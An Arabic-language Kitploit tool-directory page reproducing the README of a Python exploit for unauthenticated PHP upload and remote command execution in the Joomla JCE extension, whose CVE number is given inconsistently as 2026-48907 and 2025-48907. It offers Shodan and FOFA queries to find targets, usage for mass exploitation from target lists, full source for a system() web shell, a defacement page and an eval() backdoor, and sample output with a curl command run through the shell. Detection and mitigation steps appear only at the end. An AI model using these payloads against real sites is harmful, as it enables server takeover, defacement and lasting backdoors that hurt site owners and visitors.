Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48907 — CVE-2025-48907 - استغلال تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة لـ Joomla JCE < 2.9.99.5 | Kitploit
أدوات/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - استغلال تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة لـ Joomla JCE < 2.9.99.5

عرض المستودع
41منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
شعار Joomla

CVE-2026-48907 - ثغرة تنفيذ الأوامر عن بُعد غير المُوثَّقة في Joomla! JCE

إضافة JCE لـ Joomla! < 2.9.99.5 - رفع ملفات PHP تعسفي غير مُوثَّق وتنفيذ أوامر عن بُعد

License: MIT Python 3.6+ Security Shodan FOFA


🔎 استعلامات محركات البحث

Shodan

root@kitploit:~
http.component:"Joomla"

FOFA

root@kitploit:~
app="Joomla"

📋 نظرة عامة

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال الثغرة CVE-2026-48907، وهي ثغرة خطيرة في إضافة JCE (محرر محتوى Joomla) لإصدارات Joomla! السابقة للإصدار 2.9.99.5. تسمح الثغرة للمهاجمين غير المُوثَّقين برفع ملفات PHP تعسفية عبر وظيفة استيراد ملفات التعريف في JCE، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE).

⚠️ إخلاء مسؤولية

هذه الأداة لأغراض تعليمية واختبارية مُصرَّح بها فقط.

  • استخدمها فقط على أنظمة تملكها أو لديك إذن صريح لاختبارها
  • المؤلف غير مسؤول عن أي إساءة استخدام أو أنشطة غير قانونية
  • احصل دائمًا على التفويض المناسب قبل الاختبار

🔍 تفاصيل الثغرة

كيف تعمل

  1. استخراج رمز CSRF: يقوم الاستغلال أولاً باستخراج رمز CSRF من الصفحة الرئيسية للهدف
  2. إساءة استخدام استيراد ملف التعريف: يستغل وظيفة استيراد ملفات التعريف في JCE (index.php?option=com_jce&task=profiles.import)
  3. رفع ملف PHP: يرفع ملف PHP ضار متخفيًا كملف تعريف XML
  4. تنفيذ الأوامر: يتم وضع ملف PHP المرفوع في مجلد /tmp/ ويمكن تنفيذه عبر الوصول المباشر

🚀 الميزات

  • ✅ رفع أي ملف PHP: رفع قذائف PHP مخصصة أو أبواب خلفية أو صفحات تشويه تعتمد على PHP
  • ✅ معالجة دفعة: فحص واستغلال أهداف متعددة من ملف
  • ✅ كشف تلقائي لرمز CSRF: استخراج رموز CSRF تلقائيًا
  • ✅ وضع الإسهاب: مخرجات مفصلة لتصحيح الأخطاء
  • ✅ تصدير النتائج: حفظ عناوين URL الناجحة للرفع إلى ملف

📦 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# Install required dependencies
pip3 install requests urllib3

المتطلبات

  • Python 3.6 أو أحدث
  • مكتبة requests
  • مكتبة urllib3

🎯 الاستخدام

الصيغة الأساسية

root@kitploit:~
python3 CVE-2025-48907.py -u <TARGET_URL> -F <PHP_FILE_TO_UPLOAD>

أمثلة

رفع قذيفة ويب PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

رفع صفحة تشويه PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

رفع باب خلفي PHP

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

استغلال دفعة مع ملف أهداف

root@kitploit:~
python3 CVE-2025-48907.py -f targets.txt -F payload.php

مع إخراج إسهاب وحفظ النتائج

root@kitploit:~
python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

وسائط سطر الأوامر

* يجب توفير إما -u أو -f

تنسيق ملف الأهداف

أنشئ ملف targets.txt مع عنوان URL واحد في كل سطر:

root@kitploit:~
http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# Comments are ignored
https://example-joomla.com

🔧 إنشاء حمولات PHP

يجب أن تكون جميع الحمولات ملفات PHP لأن الاستغلال يرفع كود PHP سيتم تنفيذه على الخادم.

قذيفة ويب PHP

أنشئ shell.php:

root@kitploit:~
<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

صفحة تشويه PHP

أنشئ deface.php:

root@kitploit:~
<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

باب خلفي PHP (حد أدنى)

أنشئ backdoor.php:

root@kitploit:~
<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 مثال على الإخراج

root@kitploit:~
_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ الكشف والتخفيف

كيفية الكشف

  • التحقق من وجود ملفات PHP مشبوهة في مجلد /tmp/
  • مراقبة نشاط استيراد ملفات تعريف JCE في السجلات
  • البحث عن طلبات غير متوقعة مثل index.php?option=com_jce&task=profiles.import
  • التحقق من وجود ملفات ذات امتداد .xml.php في /tmp/
  • مراقبة تنفيذ PHP غير عادي من مجلد /tmp/

خطوات التخفيف

  1. تحديث إضافة JCE:

    • الترقية إلى الإصدار 2.9.99.5 أو أحدث
    • تنزيل من: الموقع الرسمي لـ JCE
  2. حلول مؤقتة:

    • تعطيل إضافة JCE إذا لم تكن مطلوبة
    • تطبيق قواعد جدار حماية تطبيقات الويب (WAF)
    • تقييد تنفيذ PHP في مجلد /tmp/
    • تعطيل allow_url_fopen إذا لم يكن مطلوبًا
  3. إجراءات ما بعد الاختراق:

    • إزالة ملفات PHP المرفوعة من /tmp/
    • تدقيق النظام بحثًا عن أبواب خلفية
    • إعادة تعيين جميع بيانات الاعتماد (مدير Joomla, FTP, الاستضافة)
    • مراجعة سجلات النظام بحثًا عن وصول غير مصرح به
    • التحقق من وجود ملفات أخرى مُخترقة

📝 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

License: MIT


🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب.

  1. انسخ (Fork) المستودع
  2. أنشئ فرع الميزة الخاص بك (git checkout -b feature/AmazingFeature)
  3. قم بتثبيت التغييرات (git commit -m 'Add some AmazingFeature')
  4. ادفع إلى الفرع (git push origin feature/AmazingFeature)
  5. افتح طلب سحب

⭐ تاريخ النجوم

إذا وجدت هذه الأداة مفيدة، يُرجى التفكير في منحها نجمة ⭐ على GitHub!


📞 الاتصال والدعم

  • المؤلف: 0xgh057r3c0n
  • GitHub: https://github.com/0xgh057r3c0n/CVE-2025-48907
  • المشكلات: الإبلاغ عن خطأ

🔗 المراجع

  • NVD - CVE-2025-48907
  • JCE Official Website
  • Joomla! Security Center

بُنِيَ بـ ❤️ بواسطة 0xgh057r3c0n
تنزيل الأداة
الخاصيةالقيمة
معرف CVECVE-2026-48907
المنتجإضافة JCE لـ Joomla!
الإصدارات المتأثرة< 2.9.99.5
نوع الثغرةرفع ملف PHP غير مُوثَّق → تنفيذ أوامر عن بُعد
درجة CVSS9.8 (حرجة)
متجه الهجومالشبكة
المصادقةغير مطلوبة
التأثيراختراق كامل للنظام
الوسيطمطلوبالوصف
-u, --urlنعم*عنوان URL هدف واحد (مثال: http://target.com)
-f, --fileنعم*ملف يحتوي على قائمة عناوين URL للأهداف (واحد في كل سطر)
-F, --upload-fileنعمملف PHP للرفع (قذيفة، باب خلفي، صفحة تشويه)
-v, --verboseلاتفعيل الإخراج المُفصَّل لتصحيح الأخطاء
-o, --outputلاحفظ عناوين URL الناجحة للرفع إلى ملف